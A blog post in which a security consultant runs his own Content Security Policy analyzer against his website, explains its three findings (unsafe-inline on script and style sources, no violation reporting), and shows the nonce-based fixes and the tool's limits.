← Back

I Built a Security Scanner, Then Pointed It at Myself

Apr 27, 2026 · 7 min read

Most security writing aimed at engineers stops at the policy diagram. The hard part — what the broken version actually looks like in a browser, on the wire, in a Burp tab — usually doesn't make the slide. After enough years of explaining that gap by hand, I wanted a place where the gap was the demo. So I started building one.

What the lab is

lab.marwandiallo.com is a small set of hands-on security playgrounds for the failure modes I run into most in consulting work: identity (passkeys + JWT), Content Security Policy, prompt injection against LLM apps, SSRF and cloud metadata exposure, and broken object-level authorization. Each lab pairs a working tool or simulator with the specific bug class it teaches.

Architecturally, the labs are deterministic rule engines, not AI. They follow the same pattern as Google's csp-evaluator, Mozilla Observatory, and the passive scan rules in OWASP ZAP: parse the input, walk a small ruleset, return findings with severity and remediation. The intent was an engineer-friendly linter for one specific class of risk at a time, not a replacement for an audit.

The review

Before I shared the lab publicly I asked a friend who works on application security to look it over and try to break it. The first thing they asked was the question I should have asked myself a week earlier:

"Have you ever run your CSP analyzer against your own site?"

I had not. That is a bad answer for someone publishing a security tool, and it is the answer the rest of this essay is about.

What the analyzer found

I pasted the live Content-Security-Policy header from marwandiallo.com into my own analyzer. Three findings came back:

1 high · 2 low

CSP02 — 'unsafe-inline' on script-src       (high)
CSP10 — 'unsafe-inline' on style-src        (low)
CSP11 — No CSP reporting configured         (low)

Three findings, each one specific enough to be unambiguous, and the high-severity one was a textbook XSS-bypass condition.

How each finding works

CSP02 — 'unsafe-inline' on script-src

What the rule flags. A Content Security Policy that includes 'unsafe-inline' in its script-src directive. 'unsafe-inline' tells the browser it is allowed to execute any inline <script> block or DOM event handler attribute (onclick=, onerror=) that appears in the HTML.

Why this is the high-severity one. Inline scripts are the most common cross-site-scripting payload shape. If an attacker can get arbitrary HTML into the page (a comment field, a profile name, a search reflection) and the page allows inline scripts, the payload runs. CSP exists to break that chain. Allowing 'unsafe-inline' in script-src keeps the directive present in the response but effectively turns it off.

Standards mapping. OWASP Top 10 A03:2021 Injection, CWE-79 (Improper Neutralization of Input During Web Page Generation), CIS Controls v8 Safeguard 16.10 (Apply Secure Design Principles in Application Architectures).

The fix. Drop 'unsafe-inline', generate a per-request nonce in middleware, and add 'strict-dynamic'. Next.js 15 supports this directly: setting an x-nonce request header lets the framework propagate the nonce to its own runtime script tags.

// middleware.ts
const nonce = Buffer.from(crypto.randomUUID()).toString("base64");
const csp = [
  `script-src 'self' 'nonce-${nonce}' 'strict-dynamic' https://va.vercel-scripts.com`,
  // …
].join("; ");

With nonce + 'strict-dynamic' in place, an injected payload reaches the DOM and the browser refuses to execute it. The lab knows this, by the way: CSP02 is deliberately written to not fire if the policy already has 'strict-dynamic' and a nonce or hash, because in that combination browsers are required to ignore 'unsafe-inline' (CSP Level 3 §6.6.2.4). Most public CSP analyzers I've used don't get that exception right, which was part of what motivated me to write this one.

CSP10 — 'unsafe-inline' on style-src

What the rule flags. The same directive condition as CSP02, but applied to inline CSS instead of inline JavaScript.

Why it's flagged at low severity. CSS-only XSS is much harder than script XSS, but it is not zero. Attribute selectors, font ligatures, and scrollbar tricks have all been demonstrated to exfiltrate page contents one character at a time when an attacker can inject styles into a sensitive page.

Standards mapping. Same family as CSP02: CWE-79, OWASP A03:2021. Lower CVSS because the exploit is bandwidth-constrained and requires more attacker setup.

The fix. Same shape as CSP02. Tailwind compiles to external CSS, so dropping 'unsafe-inline' on style-src cost me nothing in this codebase.

CSP11 — no CSP reporting configured

What the rule flags. A CSP that does not include either report-to or report-uri directives, and no matching Report-To response header.

Why it matters. Without reporting, every CSP violation in production happens silently. You don't see the in-the-wild XSS attempts the policy is blocking, and you don't see the well-meaning library you added last week that's now triggering policy failures for real users. CSP without reporting is a control you can't observe.

Standards mapping. NIST SP 800-53 AU-2 (Audit Events) and SI-4 (System Monitoring). CIS Controls v8 Control 8 (Audit Log Management).

The fix. A small Edge route at /api/csp-report that accepts both legacy application/csp-report and modern application/reports+json payloads, caps body size at 16 KiB, and writes structured logs to Vercel runtime. Then report-to csp-endpoint; report-uri /api/csp-report in the policy and the matching Report-To response header. One route, one directive, one header.

Re-running the scanner

I pushed the changes, waited for Vercel to redeploy, and pasted the new live CSP back into the analyzer.

0 high · 0 medium · 0 low · 0 info

For independent verification I ran securityheaders.com and Mozilla Observatory against the same URL. Both passed.

What this kind of tool can and can't do

A static CSP analyzer is not a substitute for a real-world security audit. It checks a string against a fixed ruleset. Being explicit about both halves of that:

What the analyzer does:

  • Parse a Content Security Policy header and apply a ruleset of known weakening patterns (CSP01–CSP11) with severity and remediation.
  • In runtime mode, fetch a target URL on the server side and run the same ruleset against the live response headers, so you can verify what you actually ship instead of what you think you ship.
  • Honor CSP Level 3 nuance, including the 'strict-dynamic' + nonce/hash exception that makes most public analyzers report false positives.
  • Export findings as JSON or SARIF for use in CI and GitHub code scanning.

What the analyzer does not do:

  • Test whether the nonce is genuinely unique per request, which is a critical implementation bug in some homemade middlewares.
  • Find your missing security controls; only your weak existing ones.
  • Catch logic flaws, IDOR, broken authorization, or any OWASP Top 10 category that isn't string-shaped.
  • Replace a code review, a threat model, or an actual penetration test.

What it does well is give you a one-minute read on whether the security header you spent half an hour writing is actually doing its job. It is roughly the same category of feedback as ESLint or cargo clippy: a fast, deterministic linter for one specific class of risk.

Closing

The thing I keep coming back to from this exercise is small but useful: the tool you build to score other people's work has to be the first one you score yourself with. Not because the finding will always be a high — most of the time it won't — but because the act of running it forces you to sit in the same chair as the people you're asking to take it seriously.

If you want to do the same exercise on your own site, the CSP analyzer is here. Paste your header into the textarea, or drop a URL into the scanner mode and let it fetch your live policy. If you find something interesting, or find a bug in the analyzer itself, I'd like to hear about it.

I Built a Security Scanner, Then Pointed It at Myself